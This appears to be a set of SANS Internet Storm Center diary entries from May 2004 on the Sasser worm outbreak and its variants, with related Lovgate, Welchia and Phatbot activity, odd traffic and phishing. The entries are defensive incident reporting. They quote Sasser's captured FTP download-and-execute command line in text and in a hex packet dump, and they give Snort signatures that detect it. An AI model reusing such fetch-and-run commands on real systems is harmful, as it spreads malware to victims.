Several news have reported that the author of Sasser worm has been caught in Germany. Check this out at:



http://www.lka.niedersachsen.de/aktuelles/archiv/2004/sasser_080504.htm (German)

In a Microsoft Press Release, Microsoft says that they will hold a teleconference about this arrest:

Another piece of news also reported that Phatbot creator has been hunted down too:

http://www.heise.de/newsticker/meldung/47209 (German)

New Sasser Worm Variant

We received a submission from Duda that he has detected a possible new Sasser worm variant infection via port 1023 instead of the usual port 5554. If you have seen this, please let us know.

echo off&echo open xx.xx.xx.xx 1023>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 17325_upload.exe>>cmd.ftp
&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&17325_upload.exe&echo off&del cmd.ftp&echo on

According to Mcafee writeup, this is the Sasser E variant and it matches the ports used:

* It creates a remote shell on TCP port 1022 rather than 9995 or 9996

* It uses FTP on TCP port 1023 instead of 5554


SANS Security Newsletters and Digests

Too much news to catch up? SANS provides weekly security newsletters and digests. This allows you to update yourself especially if you are not able to track security news everyday. Over the weekend, do take a look and sign up for the free newsletters and digests.



Published: 2004-05-07

Odd Packets

From the front line

A number of sites have been seeing unusual SYN-ACK traffic coming from port 80,
that at first glance appears to be backscatter from a DDoS attack. A closer look
leaves us slightly puzzled. Note: these logs have been sanitized to protect the
guilty and the innocent.

11:57:58.477497 IP (tos 0x0, ttl 112, id 32814, offset 0, flags [DF], length: 40) > S [tcp sum ok]
2030205186:2030205186(0) ack 25686 win 65535
4500 0028 802e 4000 7006 1ad7 0a0a 0a67
c0a8 9ab1 0050 a18f 7902 7902 0000 6456
5b12 ffff 3ccd 0000 0000 0000 0000
12:09:05.651825 IP (tos 0x0, ttl 112, id 23183, offset 0, flags [DF], length: 40) > SE [tcp sum ok]
1244547630:1244547630(0) ack 36086 win 65535
4500 0028 5a8f 4000 7006 4076 0a0a 0a67
c0a8 9ab1 0050 6c7c 4a2e 4a2e 0000 8cf6
5652 ffff aba8 0000 0000 0000 0000
12:45:12.480408 IP (tos 0x0, ttl 112, id 11525, offset 0, flags [DF], length: 40) > SW [tcp sum ok]
1565220171:1565220171(0) ack 35766 win 65535
4500 0028 2d05 4000 7006 6e00 0a0a 0a67
c0a8 9ab1 0050 4cbf 5d4b 5d4b 0000 8bb6
5092 ffff ac2b 0000 0000 0000 0000

Some unusual patterns that a number of us have picked up on from the traffic:

- Different combinations of the TCP reserved / ECN (Explicit Congestion
Notification) flags set. If these were valid ECN SYN-ACKS, they would have
only the SYN, ACK, and ECN-ECHO flags set.

- The TCP Window size is maxed out on all the packets

- Sequence numbers have definite pattern of repeating 2 bytes
(4 hex characters), examples:

Seq: 0x79027902

Seq: 0x4a2e4a2e

Seq: 0x5d4b5d4b

This is unusual, as these sequence numbers are coming from a host that initially
you assume is suffering a DDoS attack. Has anyone seen this traffic? Got packets?

Handler on Duty: Mike Poor <mike .at. intelguardians.com>


Published: 2004-05-06

/ Reading Logs / More Phishing / TCP 135, Welchia and Lovgate / Sasser slowing / Egress Filtering and You /

Reading Your Logs Pays Off

Chas Tomlin, a sysadmin and programmer for the University of Southampton noticed some odd entries in his web logs and forwarded it to the ISC for analysis. Examination showed that an attack based on the do_brk exploit ( http://secunia.com/advisories/10328/ ) was attempted and failed. Systems shown to be vulnerable to this attack have the following kernels:

2.4.20-18.9 as shipped with RedHat 9.0

2.4.22 (vanilla)

2.4.22 with grsecurity patch

Please make sure your systems are patched and/or upgraded as needed.

Another eBay Phishing Scam

Anthony Congiano a helpdesk administrator alerted the ISC earlier today to another attempt at Phishing information from eBay users. The e-mail in question tells the recipient that their account has been used "to make fake bids" and "you are required to verify your eBay account by following the link below." The scam is designed to collect E-Bay member names, user names, passwords and credit card information. eBay, and the web host have been notified.

Port 135 Spikes, Lovgate and Welchia

The traffic pattern on port 135(TCP) noted in yesterday's diary entry continues today but appears to have diminished in intensity. Packet captures in affected areas have shown an RPC DCOM attack which is one of the vectors for infection for the new Lovgate and Welchia variants identified yesterday. There are additional methods of infection for both worms.

Fixes for vulnerabilities exploited by Welchia and Lovgate have been made available in 2003. Multiple worms and bots are currently scanning for these vulnerabilities.


McAfee: http://vil.nai.com/vil/content/v_101157.htm


Trend Micro:

Sasser also seems to be slowing down as systems are patched and anti-virus updates are applied. For some interesting reading on Sasser's effects, look at these pages:

Further Reading

If you are not familiar with egress filtering, take a look at SANS instructor Chris Brenton's paper on the subject at:
and find out how you can make your network less appealing to would-be attackers.


Chris Carboni - chris.carboni_at_verizon.net


Published: 2004-05-05

port 135 spikes, Lovegate, Welchia.K, Mailbag, Unix Security

Port 135 Spikes

Over the last few days, a number of networks detected a sharp, almost vertical,
rise in port 135 (tcp) traffic and a subsequent exponential decay. Typically,
these traffic bursts last for a few hours. From selected packet captures, it
looks like these scans attempt to exploit the RPC DCOM vulnerability. Several
possible sources have been suggested. It is likely that these scans are caused
by botnets which are scanning given target networks for new, vulnerable hosts.

Lovgate Virus

A virus sample submitted to us on Monday is now identified as LovGate.R.
In addition to spreading via e-mail, the virus uses the RPC DCOM
vulnerability to spread and it will open file shares on infected systems.
This virus is one suspected cause of the rise in port 135 traffic.

McAfee: http://vil.nai.com/vil/content/v_101157.htm

Symantec: http://securityresponse.symantec.com/avcenter/venc/data/w32.lovgate.r@mm.html
Welchia.K Worm

A new version of 'welchia' (aka Nachi) has been identified. This worm, which was
first identified in the wake of blaster last august, is most noted for the ICMP
echo requests that it sends. Welchia.K includes exploits for the following vulnerabilities:

* RPC Locator

* WebDAV (you will see URLs that start with 'SEARCH' in your web log)


* MS Workstation
Fixes for all these vulnerabilities were made available in 2003. Multiple worms and bots are currently scanning for these vulnerabilities.

Trend Micro: http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.K
Mailbag: Cleanup Woes

A reader asked why we recommend a complete rebuild of systems infected with 'sasser', given that 'sasser' is rather benign and easy to clean.

The problem with 'sasser' is that it is an indicator exploit. The fact that you
are infected with 'sasser' indicates that you were vulnerable to the LSASS
exploit. Before sasser, a large number of bot variants exploited this same vulnerability. We find that many systems infected with 'sasser' are infected with one or more bots in addition to 'sasser'.

Each day, we receive several distinct 'bot' samples. Antivirus signatures are typically not able to keep up with all versions, and many 'bots' include specific code to plant backdoors, disable firewalls and antivirus products, or to add additional system accounts.

Antivirus software is not able to reliably detect and clean all of these bots. As a result, it is impossible to tell if any of these bots are left on your system. Only a thorough (and costly) forensics analysis by a trained specialist will provide some assurance.

As a result, if you are infected by 'sasser', try to rebuild your system from scratch. For detailed instructions on setting up a new system safely, see
http://www.sans.org/rr/papers/index.php?id=1298 (Windows XP: Surviving the first day). If you acquire a new system, assume it is not yet patched and use
extreme care the first time you connect it to the network.

Reading Room Recommendation

Given all the Windows security news, don't neglect your UNIX / Linux systems.
You may either want to consult the Center for Internet Security's benchmarks ( http://www.cisecurity.org ) or, for a quick checkup, see fellow handler Bill Stearn's paper: http://www.sans.org/rr/special/essential_host_security.php

Johannes Ullrich, jullrich_AT_sans.org


Published: 2004-05-04

Back to Green / Previous Sasser Traffic Analysis / Phatbot Source Code / Netsky.AC / CheckPoint VPN-1 Vulnerability

Back to Green

Yes...we are back to green. Things are quite calm, there is no new version of Sasser and no significant impact is being observed.
Some numbers about Sasser:

According Microsoft, 1.5 million users downloaded the cleanup tool via Windows Update.

The Internet Storm Center numbers are close to Microsoft:

- 500k on May 1st

- 700k on May 2nd
Previous Sasser Traffic Analysis
After an analysis performed by our handlers (Tom Liston, Lorna
Hutcheson and Toby Kohlenberg) we have a reliable indication that there
were some attempts to include the HOD LSASS exploit code by SecurityLab
, public available at April 29, in the Agobot worm. We believe that
some tests were being done over the internet using a zombie network
with some code modifications, and that some people may had confused
it with the real Sasser worm.
Phatbot Source Code
After some rumors about the phatbot source code, it was made available
today in a post in some mailing lists. The pack includes not only the
source code but also documentation and some html FAQs.
More variants are expected.
The Sasser ´fix´ hoax email, related yesterday on Handlers Diary is the
latest variation of the Netsky virus that tries to deliver itself as a
suppose tool to fix the sasser worm (also Netsky.AB, Beagle.AB,
Mydoom.F and MSBlast.B)
Reference: http://isc.sans.org/diary.php?date=2004-05-03

VPN-1 vulnerability
Checkpoint just released an advisory about a vulnerability in ISAKMP
that affects the Check Point VPN-1 product.

According the advisory, the ISAKMP vulnerability may affect VPN-1 during "negotiations of a VPN tunnel which may cause a buffer overrun,
potentially compromising the gateway."

Checkpoint recommends that customers install an update on all enforcement modules.
References: http://www.checkpoint.com/techsupport/alerts/ike_vpn.html

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-05-03

Update: Sasser.d to start the work week, clean up tools may not be adequate

Due to the continuing spread of Sasser and the other malicious code targeting the MS04-011 vulnerabilities, we will remain at Infocon Yellow overnight. We will reevaluate the situation in the morning.

Sasser worm family continues to spread

The Sasser worm outbreak that began early Saturday morning continues. There have been at least 4 distinct variants noted so far. The primary difference between the first 3 was in the name of the file installed and increasing the number of scanning threads from 100 to 1000. The fourth variant, Sasser.d, which started appearing this morning also added a component to use pings (ICMP echo requests) to scan for other hosts to infect. It can generate more than 30 packets/sec with no payload. On a network with many unpatched systems, this could lead to network congestion similar to what was seen when Nachi came out last August. Also, because it will scan multicast addresses, there have been some reports that some routers which route multicast traffic have become unstable as a result of Sasser infections. A reminder, that systems patched against the issues described in MS04-011 are not vulnerable to this worm. If you haven't patched yet, do so immediately.

One of the ISC handlers, Tom Liston, has captured some of the Sasser.d ICMP activity on his research honeynet and is making the captures available at http://isc.sans.org/presentations/sasser_d.cap.zip

Sasser 'fix' hoax e-mail

This afternoon there is a hoax e-mail making the rounds purporting to be from an anti-virus vendor and claiming to have a clean up tool for Sasser attached. This is, in fact, a new NetSky variant. Anti-virus vendors will never send the tools as attachments in e-mail. Always check the vendor's web site for their latest clean up tools.

Automatic cleanup tools

Microsoft and most of the anti-virus vendors are providing tools for the automatic removal of some of the Sasser variants (see yesterday's diary). While we don't want to discourage people from using these tools, we also don't want the public to get too complacent and think that once they use one of these tools everything is fine. We are seeing a great deal of evidence of multiple infections on machines with Sasser. That is, machines infected with Sasser are often also infected with something else, frequently one of the recent agobot/gaobot/phatbot variants that also target the MS04-011 vulnerabilities. Our standard advice remains, if you get infected, your best course of action is a complete rebuild of the system. If you reinstall a system, or configure a new system, you will have to
enable a firewall before connecting the system to a network. Internal
LANs may be infected as well. Windows XP users may follow our guide:
Windows XP, Surviving the First Day

Alternatively, you may want to use a small hardware firewall appliance.

Jim Clausing, handler on duty


Published: 2004-05-02

Multiple Exploits targeting Microsoft MS-04-011 vulnerabilities threaten networks.

Flash Update (May 3rd 09:30 AM): We did receive some initial reports about a significant rise in ICMP traffic, which may point to a new worm with Nachi style ICMP component

Sasser/SasserB and SasserC are just one component of multiple MS04-011 Exploits Threatening Networks

SasserC, reported by Joe Stewart of Security Service Provider LURHQ
( http://www.lurhq.com ), is currently undergoing analysis. Joe reports that SasserC spawns 1024 threads to attack other systems, and it seems poised
to torch networks that are not patched for the MS04-011 vulnerabilities. Let's
hope MS shares some realtime numbers of infected systems from their customers
use of the Microsoft Sasser cleaning tool (link below). In addition, Gaobot
variants are actively exploiting systems using MS04-011 vulnerabilities

Speaking of Gaobot variants, the ISC has received quite a
few submissions of suspected malware this week from participants for analysis.
The suspected malware failed detection by vendor malware scanning applications.
Our recent experience with submitting the new variants to the vendors for
confirmation, identification and deployment of new definitions to detect the
obvious malware indicates that there's a 72 hour lag between submission and
deployment of definitions to detect the malware. During that time, many
Universities are reporting that the malware is causing disruptions and incident
responses ranging from minor to major.

In an effort to reduce their own
support costs, many network operators are referring owners of infected systems
to Microsoft for support and cleanup help, Microsoft provides free support for
virus and trojan infection cleanup;

"Get Help with Security and Virus-related Issues"
"Get free help by phone: 1 (866) 727-2338 (Toll free; US and Canada only)"

ISC and ISC Participants - MS04-011 exploits and Malware Analysis
Handlers and ISC participants contributing to this weekends analysis (links next) were; Lorna Hutcheson, Toby Kohlberg, Scott Fendley, David Tulo,
(Senior Network Forensics Engineer), Joe Stewart (GCIH, Senior Security
Researcher LURHQ)
and Eric Jacobsen - snort signature.
We would also like to extend a big thanks for all of the other ISC
participants who took the time this week to submit their reports of suspicious
activity, files of suspected malware and individual efforts at analysis of the
exploitation of the Microsoft vulnerabilities announced over the last 6
ISC and ISC Participant analysis of MS-04-011 exploits and Sasser

Handler's Diary May 1st 2004

Handler's Diary April 30th 2004
Sasser Removal Tools

Symantec W32.Sasser Removal Tool

F-Secure Sasser Removal Tool

McAfee Sasser Removal Tool

Microsoft's Sasser Removal Tool

"Step 4: Review Additional Technical Resources - If the cleaning tool above doesn't work for you, use the free worm removal tool available at your preferred antivirus software vendor's Web site"

AV Vendor and Other Sasser Analysis links

LURHQ analysis;







Microsoft's Sasser Warning and Tool Information

Yesterday, May 1st, <U>the</U> top announcement at Microsoft.Com was and still is - "Sasser Worm: Important Information - What to do to protect against or remove the worm - Actions you can take" (click the radio button and there's a tool for removal).
"Step 3: Automatically Check For and Remove Sasser
You can use this tool to search your hard drive for and try to remove the Sasser worm and its variants. To do so, click Check My PC for Infection.

"Check my PC for Infection"

Also "Note If you'd like to run this scanning and cleaning tool manually, you can access it from the Microsoft.com Download Center"


Published: 2004-05-01

Updated: MS04-011 LSASRV Exploit; Sasser Worm Update: Sasser.b

Updated: MS04-011 LSASRV Exploit

We received reports late last night from David Tulo reporting suspicious traffic. After much analysis by many handlers and help from him by providing captures and what he was seeing (nice analysis job David), we were able to match the traffic as an exploit against the LSASRV vulnerability in MS04-011. For more information

We also observed and captured similar traffic to two other locations. This traffic does match a published exploit code against the LSASRV. (Thanks to fellow handler Toby Kohlenberg for pointing out the difference in this traffic and the exploit David was seeing) The exploit is very similar to Sasser and may mislead folks in what they are seeing. The destinations port observed was 445. However, this exploit lacks the FTP attempts and the communication on ports 5554 and 9996. Also there are no files dropped on the system. It appears to determine the OS type and then attempt to shovel a shell back to a specific IP address. If it fails the LSASS crashes and the system is rebooted.

The possiblity exists for this to be turned into a worm. No sign of this yet.

It is important to make sure your systems are patched and that you block traffic on port 445 if possible.
Sasser Worm Update

Sasser.b is already confirmed in the wild. This one however drops a file called avserv2.exe. Here are two links for more information:



Symantec has released their analysis of the Sasser worm and have it classified currently as a Level 3(for both versions). Their analysis can be found at


Symantec has also provided a tool for the removal of Sasser and it can be found at:


LURHQ ( http://www.lurhq.com ) reports a third version which increases the number of scanning threads to 1024.
The Secunia site provides links to the major vendors and their analysis. They are also listing this as a medium threat right now.

LURHQ has released and analysis of Sasser and can be found at:

Eric Jacobsen wrote the following snort signature:

updated May 2nd

The first signature detects the sasser ftp command on its backdoor port (9996):

alert tcp $HOME_NET any -> any 9996 ( msg:"Sasser ftp script to transfer up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000000; rev:3;)

The second signature will trigger on the actual ftp download on port 5554:

alert tcp any any -> $HOME_NET 5554 ( msg:"Sasser binary transfer get up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000001; rev:1;)
It is based on this capture of what appears Sasser submitted to ISC by Eric Conrad:

05/01-12:05:28.458194 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49167 IpLen:20 DgmLen:48 DF

******S* Seq: 0x605F104A Ack: 0x0 Win: 0xFAF0 TcpLen: 28

TCP Options (4) => MSS: 1460 NOP NOP SackOK


05/01-12:05:28.498249 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49168 IpLen:20 DgmLen:40 DF

***A**** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20


05/01-12:05:28.503069 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49169 IpLen:20 DgmLen:41 DF

***AP*** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

65 e


05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF

***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope

6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n

35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec

68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm

64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user&

65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft

70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917

5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp

26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f

74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp -

73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_

75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off&

64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo

20 6F 6E 0A on.


05/01-12:05:29.490393 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49184 IpLen:20 DgmLen:40 DF ***A***F Seq: 0x605F1120 Ack:
0xE15F8D72 Win: 0xFAF0 TcpLen: 20


Lorna Hutcheson


Handler on Duty